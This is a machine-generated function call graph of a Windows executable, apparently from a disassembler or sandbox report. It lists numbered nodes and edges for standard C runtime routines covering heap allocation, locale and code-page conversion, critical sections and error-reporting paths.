14401->14382 14403 4145f0 InterlockedIncrement 14402->14403 14404 4145f3 14402->14404 14403->14404 14405 414600 14404->14405 14406 4145fd InterlockedIncrement 14404->14406 14407 41460a InterlockedIncrement 14405->14407 14408 41460d 14405->14408 14406->14405 14407->14408 14409 414617 InterlockedIncrement 14408->14409 14411 41461a 14408->14411 14409->14411 14410 414633 InterlockedIncrement 14410->14411 14411->14410 14412 414643 InterlockedIncrement 14411->14412 14413 41464e InterlockedIncrement 14411->14413 14412->14411 14413->14385 14418 40d606 LeaveCriticalSection 14414->14418 14416 4106ba 14416->14387 14417->14401 14418->14416 14420 40d629 __sopen_helper 14419->14420 14421 40d64f 14420->14421 14445 40ec4d 14420->14445 14427 40d65f __sopen_helper 14421->14427 14491 411c75 14421->14491 14427->14326 14429 40d680 14433 40d6e0 __lock 62 API calls 14429->14433 14430 40d671 14432 40bfc1 __sopen_helper 62 API calls 14430->14432 14432->14427 14434 40d687 14433->14434 14435 40d6bb 14434->14435 14436 40d68f 14434->14436 14438 40b6b5 __read_nolock 62 API calls 14435->14438 14437 41389c __getstream InitializeCriticalSectionAndSpinCount 14436->14437 14439 40d69a 14437->14439 14440 40d6ac 14438->14440 14439->14440 14441 40b6b5 __read_nolock 62 API calls 14439->14441 14496 40d6d7 14440->14496 14443 40d6a6 14441->14443 14444 40bfc1 __sopen_helper 62 API calls 14443->14444 14444->14440 14499 413d5b 14445->14499 14448 40eaa2 __NMSG_WRITE 62 API calls 14450 40ec79 14448->14450 14449 413d5b __set_error_mode 62 API calls 14453 40ec61 14449->14453 14451 40eaa2 __NMSG_WRITE 62 API calls 14450->14451 14452 40d63e 14451->14452 14454 40eaa2 14452->14454 14453->14448 14453->14452 14455 40eab6 14454->14455 14456 413d5b __set_error_mode 59 API calls 14455->14456 14487 40d645 14455->14487 14457 40ead8 14456->14457 14458 40ec16 GetStdHandle 14457->14458 14460 413d5b __set_error_mode 59 API calls 14457->14460 14459 40ec24 _strlen 14458->14459 14458->14487 14463 40ec3d WriteFile 14459->14463 14459->14487 14461 40eae9 14460->14461 14461->14458 14462 40eafb 14461->14462 14462->14487 14505 40ef42 14462->14505 14463->14487 14466 40eb31 GetModuleFileNameA 14468 40eb4f 14466->14468 14474 40eb72 _strlen 14466->14474 14470 40ef42 _strcpy_s 59 API calls 14468->14470 14471 40eb5f 14470->14471 14472 40e61c __invoke_watson 10 API calls 14471->14472 14471->14474 14472->14474 14484 40ebb5 14474->14484 14521 411da6 14474->14521 14477 40ebd9 14480 413ce7 _strcat_s 59 API calls 14477->14480 14479 40e61c __invoke_watson 10 API calls 14479->14477 14481 40ebed 14480->14481 14483 40ebfe 14481->14483 14485 40e61c __invoke_watson 10 API calls 14481->14485 14482 40e61c __invoke_watson 10 API calls 14482->14484 14539 413b7e 14483->14539 14530 413ce7 14484->14530 14485->14483 14488 40e7ee 14487->14488 14590 40e7c3 GetModuleHandleW 14488->14590 14494 411c7e 14491->14494 14493 40d66a 14493->14429 14493->14430 14494->14493 14495 411c95 Sleep 14494->14495 14593 40b84d 14494->14593 14495->14494 14623 40d606 LeaveCriticalSection 14496->14623 14498 40d6de 14498->14427 14500 413d6a 14499->14500 14501 40bfc1 __sopen_helper 62 API calls 14500->14501 14502 40ec54 14500->14502 14503 413d8d 14501->14503 14502->14449 14502->14453 14504 40e744 __sopen_helper 6 API calls 14503->14504 14504->14502 14506 40ef53 14505->14506 14507 40ef5a 14505->14507 14506->14507 14512 40ef80 14506->14512 14508 40bfc1 __sopen_helper 62 API calls 14507->14508 14509 40ef5f 14508->14509 14510 40e744 __sopen_helper 6 API calls 14509->14510 14511 40eb1d 14510->14511 14511->14466 14514 40e61c 14511->14514 14512->14511 14513 40bfc1 __sopen_helper 62 API calls 14512->14513 14513->14509 14566 40ba30 14514->14566 14516 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14517 40e725 GetCurrentProcess TerminateProcess 14516->14517 14518 40e719 __invoke_watson 14516->14518 14568 40ce09 14517->14568 14518->14517 14520 40e742 14520->14466 14526 411db8 14521->14526 14522 411dbc 14523 40bfc1 __sopen_helper 62 API calls 14522->14523 14524 40eba2 14522->14524 14525 411dd8 14523->14525 14524->14482 14524->14484 14527 40e744 __sopen_helper 6 API calls 14525->14527 14526->14522 14526->14524 14528 411e02 14526->14528 14527->14524 14528->14524 14529 40bfc1 __sopen_helper 62 API calls 14528->14529 14529->14525 14531 413cff 14530->14531 14535 413cf8 14530->14535 14532 40bfc1 __sopen_helper 62 API calls 14531->14532 14533 413d04 14532->14533 14534 40e744 __sopen_helper 6 API calls 14533->14534 14536 40ebc8 14534->14536 14535->14531 14537 413d33 14535->14537 14536->14477 14536->14479 14537->14536 14538 40bfc1 __sopen_helper 62 API calls 14537->14538 14538->14533 14577 4104e0 14539->14577 14542 413ba1 LoadLibraryA 14544 413ccb 14542->14544 14545 413bb6 GetProcAddress 14542->14545 14543 413c53 14548 4104e9 __decode_pointer 6 API calls 14543->14548 14563 413c7e 14543->14563 14544->14487 14545->14544 14547 413bcc 14545->14547 14546 413c29 14546->14543 14549 4104e9 __decode_pointer 6 API calls 14546->14549 14580 41046e TlsGetValue 14547->14580 14552 413c96 14548->14552 14553 413c46 14549->14553 14551 4104e9 __decode_pointer 6 API calls 14551->14544 14561 4104e9 __decode_pointer 6 API calls 14552->14561 14552->14563 14555 4104e9 __decode_pointer 6 API calls 14553->14555 14555->14543 14556 41046e __encode_pointer 6 API calls 14557 413be7 GetProcAddress 14556->14557 14558 41046e __encode_pointer 6 API calls 14557->14558 14559 413bfc GetProcAddress 14558->14559 14560 41046e __encode_pointer 6 API calls 14559->14560 14562 413c11 14560->14562 14561->14563 14562->14546 14564 413c1b GetProcAddress 14562->14564 14563->14551 14565 41046e __encode_pointer 6 API calls 14564->14565 14565->14546 14567 40ba3c __VEC_memzero 14566->14567 14567->14516 14569 40ce11 14568->14569 14570 40ce13 IsDebuggerPresent 14568->14570 14569->14520 14576 4138fc 14570->14576 14573 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14574 41372b GetCurrentProcess TerminateProcess 14573->14574 14575 413723 __invoke_watson 14573->14575 14574->14520 14575->14574 14576->14573 14578 41046e __encode_pointer 6 API calls 14577->14578 14579 4104e7 14578->14579 14579->14542 14579->14546 14581 4104a7 GetModuleHandleW 14580->14581 14582 410486 14580->14582 14584 4104c2 GetProcAddress 14581->14584 14585 4104b7 14581->14585 14582->14581 14583 410490 TlsGetValue 14582->14583 14588 41049b 14583->14588 14587 41049f GetProcAddress 14584->14587 14586 40e76a __crt_waiting_on_module_handle 2 API calls 14585->14586 14589 4104bd 14586->14589 14587->14556 14588->14581 14588->14587 14589->14584 14589->14587 14591 40e7d7 GetProcAddress 14590->14591 14592 40e7e7 ExitProcess 14590->14592 14591->14592 14594 40b900 14593->14594 14600 40b85f 14593->14600 14595 40d2e3 _realloc 6 API calls 14594->14595 14597 40b906 14595->14597 14596 40b870 14599 40ec4d __FF_MSGBANNER 61 API calls 14596->14599 14596->14600 14602 40eaa2 __NMSG_WRITE 61 API calls 14596->14602 14604 40e7ee _doexit 3 API calls 14596->14604 14598 40bfc1 __sopen_helper 61 API calls 14597->14598 14605 40b8f8 14598->14605 14599->14596 14600->14596 14603 40b8bc RtlAllocateHeap 14600->14603 14600->14605 14606 40b8ec 14600->14606 14607 40d2e3 _realloc 6 API calls 14600->14607 14609 40b8f1 14600->14609 14611 40b7fe 14600->14611 14602->14596 14603->14600 14604->14596 14605->14494 14608 40bfc1 __sopen_helper 61 API calls 14606->14608 14607->14600 14608->14609 14610 40bfc1 __sopen_helper 61 API calls 14609->14610 14610->14605 14612 40b80a __sopen_helper 14611->14612 14613 40b83b __sopen_helper 14612->14613 14614 40d6e0 __lock 62 API calls 14612->14614 14613->14600 14615 40b820 14614->14615 14616 40def2 ___sbh_alloc_block 5 API calls 14615->14616 14617 40b82b 14616->14617 14619 40b844 14617->14619 14622 40d606 LeaveCriticalSection 14619->14622 14621 40b84b 14621->14613 14622->14621 14623->14498 14625 40daa0 HeapAlloc 14624->14625 14626 40da6c HeapReAlloc 14624->14626 14627 40da8a 14625->14627 14629 40dac3 VirtualAlloc 14625->14629 14626->14627 14628 40da8e 14626->14628 14627->14330 14628->14625 14629->14627 14630 40dadd HeapFree 14629->14630 14630->14627 14632 40db20 VirtualAlloc 14631->14632 14634 40db67 14632->14634 14634->14334 14635->14337 14636->14301 14638 414474 14637->14638 14640 41447b 14637->14640 14641 4142d1 14638->14641 14640->14157 14642 4142dd __sopen_helper 14641->14642 14672 410735 14642->14672 14646 4142f0 14693 414070 14646->14693 14649 411c75 __malloc_crt 62 API calls 14650 414311 14649->14650 14651 414430 __sopen_helper 14650->14651 14700 4140ec 14650->14700 14651->14640 14654 414341 InterlockedDecrement 14656 414351 14654->14656 14657 414362 InterlockedIncrement 14654->14657 14655 41443d 14655->14651 14659 414450 14655->14659 14660 40b6b5 __read_nolock 62 API calls 14655->14660 14656->14657 14662 40b6b5 __read_nolock 62 API calls 14656->14662 14657->14651 14658 414378 14657->14658 14658->14651 14663 40d6e0 __lock 62 API calls 14658->14663 14661 40bfc1 __sopen_helper 62 API calls 14659->14661 14660->14659 14661->14651 14664 414361 14662->14664 14666 41438c InterlockedDecrement 14663->14666 14664->14657 14667 414408 14666->14667 14668 41441b InterlockedIncrement 14666->14668 14667->14668 14670 40b6b5 __read_nolock 62 API calls 14667->14670 14710 414432 14668->14710 14671 41441a 14670->14671 14671->14668 14673 4106bc __getptd_noexit 62 API calls 14672->14673 14674 41073d 14673->14674 14675 40e79a __amsg_exit 62 API calls 14674->14675 14676 41074a 14674->14676 14675->14676 14677 413fcc 14676->14677 14678 413fd8 __sopen_helper 14677->14678 14679 410735 __getptd 62 API calls 14678->14679 14680 413fdd 14679->14680 14681 413fef 14680->14681 14682 40d6e0 __lock 62 API calls 14680->14682 14685 413ffd __sopen_helper 14681->14685 14689 40e79a __amsg_exit 62 API calls 14681->14689 14683 41400d 14682->14683 14684 414056 14683->14684 14686 414024 InterlockedDecrement 14683->14686 14687 41403e InterlockedIncrement 14683->14687 14713 414067 14684->14713 14685->14646 14686->14687 14690 41402f 14686->14690 14687->14684 14689->14685 14690->14687 14691 40b6b5 __read_nolock 62 API calls 14690->14691 14692 41403d 14691->14692 14692->14687 14717 40ec86 14693->14717 14696 4140ad 14698 4140b2 GetACP 14696->14698 14699 41409f 14696->14699 14697 41408f GetOEMCP 14697->14699 14698->14699 14699->14649 14699->14651 14701 414070 getSystemCP 74 API calls 14700->14701 14702 41410c 14701->14702 14703 414117 setSBCS 14702->14703 14706 41415b IsValidCodePage 14702->14706 14709 414180 _memset __setmbcp_nolock 14702->14709 14704 40ce09 ___convertcp 5 API calls 14703->14704 14705 4142cf 14704->14705 14705->14654 14705->14655 14706->14703 14707 41416d GetCPInfo 14706->14707 14707->14703 14707->14709 14908 413e39 GetCPInfo 14709->14908 15041 40d606 LeaveCriticalSection 14710->15041 14712 414439 14712->14651 14716 40d606 LeaveCriticalSection 14713->14716 14715 41406e 14715->14681 14716->14715 14718 40ec99 14717->14718 14722 40ece6 14717->14722 14719 410735 __getptd 62 API calls 14718->14719 14720 40ec9e 14719->14720 14723 40ecc6 14720->14723 14725 414738 14720->14725 14722->14696 14722->14697 14723->14722 14724 413fcc __setmbcp 64 API calls 14723->14724 14724->14722 14726 414744 __sopen_helper 14725->14726 14727 410735 __getptd 62 API calls 14726->14727 14728 414749 14727->14728 14729 414777 14728->14729 14731 41475b 14728->14731 14730 40d6e0 __lock 62 API calls 14729->14730 14732 41477e 14730->14732 14733 410735 __getptd 62 API calls 14731->14733 14740 4146fa 14732->14740 14735 414760 14733->14735 14738 40e79a __amsg_exit 62 API calls 14735->14738 14739 41476e __sopen_helper 14735->14739 14738->14739 14739->14723 14741 4146fe 14740->14741 14742 414730 14740->14742 14741->14742 14743 4145d2 ___addlocaleref 8 API calls 14741->14743 14748 4147a2 14742->14748 14744 414711 14743->14744 14744->14742 14751 414661 14744->14751 14907 40d606 LeaveCriticalSection 14748->14907 14750 4147a9 14750->14735 14752 414672 InterlockedDecrement 14751->14752 14753 4146f5 14751->14753 14754 414687 InterlockedDecrement 14752->14754 14755 41468a 14752->14755 14753->14742 14765 414489 14753->14765 14754->14755 14756 414694 InterlockedDecrement 14755->14756 14757 414697 14755->14757 14756->14757 14758 4146a1 InterlockedDecrement 14757->14758 14759 4146a4 14757->14759 14758->14759 14760 4146ae InterlockedDecrement 14759->14760 14762 4146b1 14759->14762 14760->14762 14761 4146ca InterlockedDecrement 14761->14762 14762->14761 14763 4146e5 InterlockedDecrement 14762->14763 14764 4146da InterlockedDecrement 14762->14764 14763->14753 14764->14762 14766 41450d 14765->14766 14768 4144a0 14765->14768 14767 41455a 14766->14767 14769 40b6b5 __read_nolock 62 API calls 14766->14769 14780 414581 14767->14780 14819 417667 14767->14819 14768->14766 14776 40b6b5 __read_nolock 62 API calls 14768->14776 14791 4144d4 14768->14791 14771 41452e 14769->14771 14773 40b6b5 __read_nolock 62 API calls 14771->14773 14778 414541 14773->14778 14774 40b6b5 __read_nolock 62 API calls 14779 414502 14774->14779 14775 40b6b5 __read_nolock 62 API calls 14775->14780 14781 4144c9 14776->14781 14777 4145c6 14782 40b6b5 __read_nolock 62 API calls 14777->14782 14785 40b6b5 __read_nolock 62 API calls 14778->14785 14786 40b6b5 __read_nolock 62 API calls 14779->14786 14780->14777 14784 40b6b5 62 API calls __read_nolock 14780->14784 14795 417841 14781->14795 14788 4145cc 14782->14788 14783 40b6b5 __read_nolock 62 API calls 14789 4144ea 14783->14789 14784->14780 14790 41454f 14785->14790 14786->14766 14788->14742 14811 4177fc 14789->14811 14793 40b6b5 __read_nolock 62 API calls 14790->14793 14791->14783 14794 4144f5 14791->14794 14793->14767 14794->14774 14796 4178cb 14795->14796 14797 41784e 14795->14797 14796->14791 14798 41785f 14797->14798 14799 40b6b5 __read_nolock 62 API calls 14797->14799 14800 417871 14798->14800 14801 40b6b5 __read_nolock 62 API calls 14798->14801 14799->14798 14802 417883 14800->14802 14803 40b6b5 __read_nolock 62 API calls 14800->14803 14801->14800 14804 417895 14802->14804 14806 40b6b5 __read_nolock 62 API calls 14802->14806 14803->14802 14805 4178a7 14804->14805 14807 40b6b5 __read_nolock 62 API calls 14804->14807 14808 4178b9 14805->14808 14809 40b6b5 __read_nolock 62 API calls 14805->14809 14806->14804 14807->14805 14808->14796 14810 40b6b5 __read_nolock 62 API calls 14808->14810 14809->14808 14810->14796 14812 41783d 14811->14812 14813 417809 14811->14813 14812->14794 14814 417819 14813->14814 14815 40b6b5 __read_nolock 62 API calls 14813->14815 14816 41782b 14814->14816 14817 40b6b5 __read_nolock 62 API calls 14814->14817 14815->14814 14816->14812 14818 40b6b5 __read_nolock 62 API calls 14816->14818 14817->14816 14818->14812 14820 417678 14819->14820 14906 41457a 14819->14906 14821 40b6b5 __read_nolock 62 API calls 14820->14821 14822 417680 14821->14822 14823 40b6b5 __read_nolock 62 API calls 14822->14823 14824 417688 14823->14824 14825 40b6b5 __read_nolock 62 API calls 14824->14825 14826 417690 14825->14826 14827 40b6b5 __read_nolock 62 API calls 14826->14827 14828 417698 14827->14828 14829 40b6b5 __read_nolock 62 API calls 14828->14829 14830 4176a0 14829->14830 14831 40b6b5 __read_nolock 62 API calls 14830->14831 14832 4176a8 14831->14832 14833 40b6b5 __read_nolock 62 API calls 14832->14833 14834 4176af 14833->14834 14835 40b6b5 __read_nolock 62 API calls 14834->14835 14836 4176b7 14835->14836 14837 40b6b5 __read_nolock 62 API calls 14836->14837 14838 4176bf 14837->14838 14839 40b6b5 __read_nolock 62 API calls 14838->14839 14840 4176c7 14839->14840 14841 40b6b5 __read_nolock 62 API calls 14840->14841 14842 4176cf 14841->14842 14843 40b6b5 __read_nolock 62 API calls 14842->14843 14844 4176d7 14843->14844 14845 40b6b5 __read_nolock 62 API calls 14844->14845 14846 4176df 14845->14846 14847 40b6b5 __read_nolock 62 API calls 14846->14847 14848 4176e7 14847->14848 14849 40b6b5 __read_nolock 62 API calls 14848->14849 14850 4176ef 14849->14850 14851 40b6b5 __read_nolock 62 API calls 14850->14851 14852 4176f7 14851->14852 14853 40b6b5 __read_nolock 62 API calls 14852->14853 14854 417702 14853->14854 14855 40b6b5 __read_nolock 62 API calls 14854->14855 14856 41770a 14855->14856 14857 40b6b5 __read_nolock 62 API calls 14856->14857 14858 417712 14857->14858 14859 40b6b5 __read_nolock 62 API calls 14858->14859 14860 41771a 14859->14860 14861 40b6b5 __read_nolock 62 API calls 14860->14861 14862 417722 14861->14862 14863 40b6b5 __read_nolock 62 API calls 14862->14863 14864 41772a 14863->14864 14865 40b6b5 __read_nolock 62 API calls 14864->14865 14866 417732 14865->14866 14867 40b6b5 __read_nolock 62 API calls 14866->14867 14868 41773a 14867->14868 14869 40b6b5 __read_nolock 62 API calls 14868->14869 14870 417742 14869->14870 14871 40b6b5 __read_nolock 62 API calls 14870->14871 14872 41774a 14871->14872 14873 40b6b5 __read_nolock 62 API calls 14872->14873 14874 417752 14873->14874 14875 40b6b5 __read_nolock 62 API calls 14874->14875 14876 41775a 14875->14876 14877 40b6b5 __read_nolock 62 API calls 14876->14877 14878 417762 14877->14878 14879 40b6b5 __read_nolock 62 API calls 14878->14879 14880 41776a 14879->14880 14881 40b6b5 __read_nolock 62 API calls 14880->14881 14882 417772 14881->14882 14883 40b6b5 __read_nolock 62 API calls 14882->14883 14884 41777a 14883->14884 14885 40b6b5 __read_nolock 62 API calls 14884->14885 14886 417788 14885->14886 14887 40b6b5 __read_nolock 62 API calls 14886->14887 14888 417793 14887->14888 14889 40b6b5 __read_nolock 62 API calls 14888->14889 14890 41779e 14889->14890 14891 40b6b5 __read_nolock 62 API calls 14890->14891 14892 4177a9 14891->14892 14893 40b6b5 __read_nolock 62 API calls 14892->14893 14894 4177b4 14893->14894 14895 40b6b5 __read_nolock 62 API calls 14894->14895 14896 4177bf 14895->14896 14897 40b6b5 __read_nolock 62 API calls 14896->14897 14898 4177ca 14897->14898 14899 40b6b5 __read_nolock 62 API calls 14898->14899 14900 4177d5 14899->14900 14901 40b6b5 __read_nolock 62 API calls 14900->14901 14902 4177e0 14901->14902 14903 40b6b5 __read_nolock 62 API calls 14902->14903 14904 4177eb 14903->14904 14905 40b6b5 __read_nolock 62 API calls 14904->14905 14905->14906 14906->14775 14907->14750 14909 413f1f 14908->14909 14911 413e6d _memset 14908->14911 14913 40ce09 ___convertcp 5 API calls 14909->14913 14918 417625 14911->14918 14915 413fca 14913->14915 14915->14709 14917 417426 ___crtLCMapStringA 97 API calls 14917->14909 14919 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 14918->14919 14920 417638 14919->14920 14928 41746b 14920->14928 14923 417426 14924 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 14923->14924 14925 417439 14924->14925 14994 417081 14925->14994 14929 4174b7 14928->14929 14930 41748c GetStringTypeW 14928->14930 14931 4174a4 14929->14931 14933 41759e 14929->14933 14930->14931 14932 4174ac GetLastError 14930->14932 14934 4174f0 MultiByteToWideChar 14931->14934 14951 417598 14931->14951 14932->14929 14956 417a20 GetLocaleInfoA 14933->14956 14939 41751d 14934->14939 14934->14951 14936 40ce09 ___convertcp 5 API calls 14938 413eda 14936->14938 14938->14923 14942 417532 _memset ___convertcp 14939->14942 14943 40b84d _malloc 62 API calls 14939->14943 14940 4175ef GetStringTypeA 14941 41760a 14940->14941 14940->14951 14946 40b6b5 __read_nolock 62 API calls 14941->14946 14945 41756b MultiByteToWideChar 14942->14945 14942->14951 14943->14942 14948 417581 GetStringTypeW 14945->14948 14949 417592 14945->14949 14946->14951 14948->14949 14952 4147ae 14949->14952 14951->14936 14953 4147ba 14952->14953 14954 4147cb 14952->14954 14953->14954 14955 40b6b5 __read_nolock 62 API calls 14953->14955 14954->14951 14955->14954 14957 417a53 14956->14957 14958 417a4e 14956->14958 14987 416f54 14957->14987 14960 40ce09 ___convertcp 5 API calls 14958->14960 14961 4175c2 14960->14961 14961->14940 14961->14951 14962 417a69 14961->14962 14963 417aa9 GetCPInfo 14962->14963 14967 417b33 14962->14967 14964 417ac0 14963->14964 14965 417b1e MultiByteToWideChar 14963->14965 14964->14965 14968 417ac6 GetCPInfo 14964->14968 14965->14967 14971 417ad9 _strlen 14965->14971 14966 40ce09 ___convertcp 5 API calls 14969 4175e3 14966->14969 14967->14966 14968->14965 14970 417ad3 14968->14970 14969->14940 14969->14951 14970->14965 14970->14971 14972 40b84d _malloc 62 API calls 14971->14972 14976 417b0b _memset ___convertcp 14971->14976 14972->14976 14973 417b68 MultiByteToWideChar 14974 417b80 14973->14974 14975 417b9f 14973->14975 14978 417ba4 14974->14978 14979 417b87 WideCharToMultiByte 14974->14979 14977 4147ae __freea 62 API calls 14975->14977 14976->14967 14976->14973 14977->14967 14980 417bc3 14978->14980 14981 417baf WideCharToMultiByte 14978->14981 14979->14975 14982 411cba __calloc_crt 62 API calls 14980->14982 14981->14975 14981->14980 14983 417bcb 14982->14983 14983->14975 14984 417bd4 WideCharToMultiByte 14983->14984 14984->14975 14985 417be6 14984->14985 14986 40b6b5 __read_nolock 62 API calls 14985->14986 14986->14975 14990 41a354 14987->14990 14991 41a36d 14990->14991 14992 41a125 strtoxl 86 API calls 14991->14992 14993 416f65 14992->14993 14993->14958 14995 4170a2 LCMapStringW 14994->14995 14998 4170bd 14994->14998 14996 4170c5 GetLastError 14995->14996 14995->14998 14996->14998 14997 4172bb 15000 417a20 ___ansicp 86 API calls 14997->15000 14998->14997 14999 417117 14998->14999 15001 417130 MultiByteToWideChar 14999->15001 15017 4172b2 14999->15017 15002 4172e3 15000->15002 15004 41715d 15001->15004 15001->15017 15006 4173d7 LCMapStringA 15002->15006 15007 4172fc 15002->15007 15002->15017 15003 40ce09 ___convertcp 5 API calls 15005 413efa 15003->15005 15012 40b84d _malloc 62 API calls 15004->15012 15022 417176 ___convertcp 15004->15022 15005->14917 15008 417333 15006->15008 15009 417a69 ___convertcp 69 API calls 15007->15009 15011 4173fe 15008->15011 15016 40b6b5 __read_nolock 62 API calls 15008->15016 15013 41730e 15009->15013 15010 4171ae MultiByteToWideChar 15014 4171c7 LCMapStringW 15010->15014 15015 4172a9 15010->15015 15011->15017 15023 40b6b5 __read_nolock 62 API calls 15011->15023 15012->15022 15013->15017 15018 417318 LCMapStringA 15013->15018 15014->15015 15020 4171e8 15014->15020 15019 4147ae __freea 62 API calls 15015->15019 15016->15011 15017->15003 15018->15008 15027 41733a 15018->15027 15019->15017 15021 4171f1 15020->15021 15026 41721a 15020->15026 15021->15015 15024 417203 LCMapStringW 15021->15024 15022->15010 15022->15017 15023->15017 15024->15015 15025 417269 LCMapStringW 15028 417281 WideCharToMultiByte 15025->15028 15029 4172a3 15025->15029 15031 417235 ___convertcp 15026->15031 15033 40b84d _malloc 62 API calls 15026->15033 15030 40b84d _malloc 62 API calls 15027->15030 15032 41734b _memset ___convertcp 15027->15032 15028->15029 15034 4147ae __freea 62 API calls 15029->15034 15030->15032 15031->15015 15031->15025 15032->15008 15035 417389 LCMapStringA 15032->15035 15033->15031 15034->15015 15037 4173a5 15035->15037 15038 4173a9 15035->15038 15040 4147ae __freea 62 API calls 15037->15040 15039 417a69 ___convertcp 69 API calls 15038->15039 15039->15037 15040->15008 15041->14712 15043 41358c 15042->15043 15044 41046e __encode_pointer 6 API calls 15043->15044 15045 4135a4 15043->15045 15044->15043 15045->14171 15049 40d281 15046->15049 15048 40d2ca 15048->14173 15050 40d28d __sopen_helper 15049->15050 15057 40e806 15050->15057 15056 40d2ae __sopen_helper 15056->15048 15058 40d6e0 __lock 62 API calls 15057->15058 15059 40d292 15058->15059 15060 40d196 15059->15060 15061 4104e9 __decode_pointer 6 API calls 15060->15061 15062 40d1aa 15061->15062 15063 4104e9 __decode_pointer 6 API calls 15062->15063 15064 40d1ba 15063->15064 15065 40d23d 15064->15065 15080 40e56a 15064->15080 15077 40d2b7 15065->15077 15067 41046e __encode_pointer 6 API calls 15068 40d232 15067->15068 15072 41046e __encode_pointer 6 API calls 15068->15072 15069 40d1fc 15069->15065 15073 411d06 __realloc_crt 72 API calls 15069->15073 15074 40d212 15069->15074 15070 40d1d8 15070->15069 15076 40d224 15070->15076 15093 411d06 15070->15093 15072->15065 15073->15074 15074->15065 15075 41046e __encode_pointer 6 API calls 15074->15075 15075->15076 15076->15067 15142 40e80f 15077->15142 15081 40e576 __sopen_helper 15080->15081 15082 40e5a3 15081->15082 15083 40e586 15081->15083 15085 40e5e4 HeapSize 15082->15085 15086 40d6e0 __lock 62 API calls 15082->15086 15084 40bfc1 __sopen_helper 62 API calls 15083->15084 15087 40e58b 15084->15087 15089 40e59b __sopen_helper 15085->15089 15090 40e5b3 ___sbh_find_block 15086->15090 15088 40e744 __sopen_helper 6 API calls 15087->15088 15088->15089 15089->15070 15098 40e604 15090->15098 15094 411d0f 15093->15094 15096 411d4e 15094->15096 15097 411d2f Sleep 15094->15097 15102 40e34f 15094->15102 15096->15069 15097->15094 15101 40d606 LeaveCriticalSection 15098->15101 15100 40e5df 15100->15085 15100->15089 15101->15100 15103 40e35b __sopen_helper 15102->15103 15104 40e370 15103->15104 15105 40e362 15103->15105 15107 40e383 15104->15107 15108 40e377 15104->15108 15106 40b84d _malloc 62 API calls 15105->15106 15110 40e36a __dosmaperr __sopen_helper 15106->15110 15115 40e4f5 15107->15115 15136 40e390 _memcpy_s ___sbh_resize_block ___sbh_find_block 15107->15136 15109 40b6b5 __read_nolock 62 API calls 15108->15109 15109->15110 15110->15094 15111 40e528 15113 40d2e3 _realloc 6 API calls 15111->15113 15112 40e4fa HeapReAlloc 15112->15110 15112->15115 15116 40e52e 15113->15116 15114 40d6e0 __lock 62 API calls 15114->15136 15115->15111 15115->15112 15117 40e54c 15115->15117 15119 40d2e3 _realloc 6 API calls 15115->15119 15121 40e542 15115->15121 15118 40bfc1 __sopen_helper 62 API calls 15116->15118 15117->15110 15120 40bfc1 __sopen_helper 62 API calls 15117->15120 15118->15110 15119->15115 15122 40e555 GetLastError 15120->15122 15124 40bfc1 __sopen_helper 62 API calls 15121->15124 15122->15110 15126 40e4c3 15124->15126 15125 40e41b HeapAlloc 15125->15136 15126->15110 15128 40e4c8 GetLastError 15126->15128 15127 40e470 HeapReAlloc 15127->15136 15128->15110 15129 40def2 ___sbh_alloc_block 5 API calls 15129->15136 15130 40e4db 15130->15110 15132 40bfc1 __sopen_helper 62 API calls 15130->15132 15131 40d2e3 _realloc 6 API calls 15131->15136 15133 40e4e8 15132->15133 15133->15110 15133->15122 15134 40e4be 15135 40bfc1 __sopen_helper 62 API calls 15134->15135 15135->15126 15136->15110 15136->15111 15136->15114 15136->15125 15136->15127 15136->15129 15136->15130 15136->15131 15136->15134 15137 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 15136->15137 15138 40e493 15136->15138 15137->15136 15141 40d606 LeaveCriticalSection 15138->15141 15140 40e49a 15140->15136 15141->15140 15145 40d606 LeaveCriticalSection 15142->15145 15144 40d2bc 15144->15056 15145->15144 15149 40b9aa __sopen_helper _strnlen 15146->15149 15147 40b9b8 15148 40bfc1 __sopen_helper 62 API calls 15147->15148 15150 40b9bd 15148->15150 15149->15147 15152 40b9ec 15149->15152 15151 40e744 __sopen_helper 6 API calls 15150->15151 15156 40b9cd __sopen_helper 15151->15156 15153 40d6e0 __lock 62 API calls 15152->15153 15154 40b9f3 15153->15154 15203 40b917 15154->15203 15156->14177 15160 4017cc _memcpy_s 15159->15160 15160->14181 15163 40af70 15161->15163 15162 40b84d _malloc 62 API calls 15162->15163 15163->15162 15164 40af8a 15163->15164 15165 40d2e3 _realloc 6 API calls 15163->15165 15167 40af8c std::bad_alloc::bad_alloc 15163->15167 15164->14186 15165->15163 15169 40d2bd __cinit 73 API calls 15167->15169 15171 40afb2 15167->15171 15169->15171 15417 40af49 15171->15417 15172 40afca 15174 401903 lstrlenA 15173->15174 15175 4018fc 15173->15175 15429 4017e0 15174->15429 15175->14209 15178 401940 GetLastError 15180 40194b MultiByteToWideChar 15178->15180 15181 40198d 15178->15181 15179 401996 15179->14209 15182 4017e0 72 API calls 15180->15182 15181->15179 15437 401030 GetLastError 15181->15437 15184 401970 MultiByteToWideChar 15182->15184 15184->15181 15186 40af66 74 API calls 15185->15186 15187 40187c 15186->15187 15188 401885 SysAllocString 15187->15188 15189 4018a4 15187->15189 15188->15189 15189->14211 15191 40231a SafeArrayUnaccessData 15190->15191 15191->14218 15193 4019df VariantClear 15192->15193 15194 4019aa InterlockedDecrement 15192->15194 15193->14225 15194->15193 15195 4019b8 15194->15195 15195->15193 15196 4019c2 SysFreeString 15195->15196 15197 4019c9 15195->15197 15196->15197 15446 40aec0 15197->15446 15200 401571 15199->15200 15202 401582 15199->15202 15452 40afe0 15200->15452 15202->14194 15204 40b930 15203->15204 15206 40b92c 15203->15206 15204->15206 15207 40b942 _strlen 15204->15207 15212 40eeab 15204->15212 15209 40ba18 15206->15209 15207->15206 15222 40edfb 15207->15222 15416 40d606 LeaveCriticalSection 15209->15416 15211 40ba1f 15211->15156 15219 40ef2b 15212->15219 15220 40eec6 15212->15220 15213 40eecc WideCharToMultiByte 15213->15219 15213->15220 15214 411cba __calloc_crt 62 API calls 15214->15220 15215 40eeef WideCharToMultiByte 15216 40ef37 15215->15216 15215->15220 15217 40b6b5 __read_nolock 62 API calls 15216->15217 15217->15219 15219->15207 15220->15213 15220->15214 15220->15215 15220->15219 15221 40b6b5 __read_nolock 62 API calls 15220->15221 15225 414d44 15220->15225 15221->15220 15317 40ed0d 15222->15317 15226 414d76 15225->15226 15227 414d59 15225->15227 